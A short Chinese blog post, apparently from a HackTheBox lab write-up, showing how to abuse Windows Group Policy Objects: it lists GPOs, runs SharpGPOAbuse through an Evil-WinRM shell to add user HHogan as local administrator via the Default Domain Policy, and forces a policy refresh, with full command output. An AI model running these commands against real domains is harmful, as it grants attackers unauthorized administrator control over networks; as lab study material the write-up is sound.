-->

GPO 的滥用行为

GPO,也就是组策略对象,是 Windows 用来大规模管理计算机的规则。通过 GPO,可以控制 Windows 计算机上的几乎所有设置。

查看所有GPO名称:

Get-GPO -All | Select-Object DisplayName

https://github.com/FSecureLABS/SharpGPOAbuse 该工具专门用于利用 GPO 的漏洞来实施攻击。

*Evil-WinRM* PS C:\programdata> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

设置后需要等到 GPO 重新加载后才能生效。如果拥有运行 gpupdate /force 的权限,该设置直接就会生效了。

*Evil-WinRM* PS C:\programdata> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

现在,HHogan属于管理员组了。

posted @ 2026-05-27 16:11  Merakii  阅读(10)  评论(0)    收藏  举报